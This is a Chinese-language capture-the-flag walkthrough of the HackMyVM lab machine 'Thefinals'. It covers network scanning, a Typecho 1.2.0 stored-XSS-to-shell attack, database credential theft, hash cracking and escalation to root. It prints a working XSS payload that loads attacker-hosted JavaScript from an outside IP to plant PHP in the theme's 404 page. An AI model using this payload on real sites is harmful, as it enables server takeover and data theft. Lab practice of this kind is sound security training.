hackmyvm靶机：Thefinals

简介

hackmyvm是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag。

部署方法

官网：https://hackmyvm.eu/

1.在官网搜索你想要的镜像,然后下载

2.下载好后解压得到.ova的文件，右击选择VMware或者Oracle VirtualBox进行打开

3.在弹出的框中，选择存放的位置，然后点击导入

4.最后等待导入完成，然后启动该虚拟机就可以了

一，信息收集

我是用kali的arp-scan，也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。

arp-scan -I eth0 -l

• -I 指定eth1这个网卡
• -l 扫描出全部主机

我们知道靶机的IP地址在192.168.31.146后使用namp扫描靶机。

nmap 192.168.31.146 -A -O -p-

• -A 进行全面扫描，包括服务版本探测、操作系统检测等。
• -O 进行操作系统检测，尝试识别远程主机的操作系统类型。
• -p 指定要扫描的端口范围或特定端口，如1-65535或80,443。

开放22，80端口。

一点信息不给啊，扫一下80端口。

gobuster dir -u http://192.168.31.146 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php,jsp,html,db,txt,xml

除了blog，其他的都是一些字体和图片。没什么可以安排的。

blog界面乱乱的，看一下源码。要追加一下域名。

这靶机的界面这么精致一看就是系统搞得，找一下是什么系统。Typecho 1.2.0，在找一下有没有漏洞。

这个系统有个xss漏洞。而且这个xss漏洞可以直接拿shell。脚本在下面。

Typecho<=1.2.0 存储型XSS 复现-CSDN博客

http://www.baidu.com/"></a><script/src=http://192.168.31.24:8000/Typecho_1.2.0.js></script><a/href="#

提交之后在404界面就可以执行php了，这里我改了一下脚本先让他走一些phpinfo。

thefinals.hmv/blog/usr/themes/default/404.php

在注入一个，拿个shell。这里用了很多方法都不行，最后是用蚁剑连上的，一看蚂蚁/bin/bash怪不得。那弹ash就可以了。

在config文件里面有用户和密码。试了一下也不是ssh的。

这个是mysql密码。查了一堆表后拿到用户名和密码，这个密码还是哈希的。爆破一下。

在跑密码的时候看一下别的。

/var/log/scotty-main.log一堆访问。监听一下看走的是什么。

弹回来一个加密过的玩意。

直接给密钥了。就是不知道是谁的。

最后试出来是thefinals的。

这个玩意还是跟shell有关的。他要99个。

那就生成伪shell就好了。

然而事情还是没有结束，这个不是shell的密码。依然是数据库的。

这个就是真的密码了。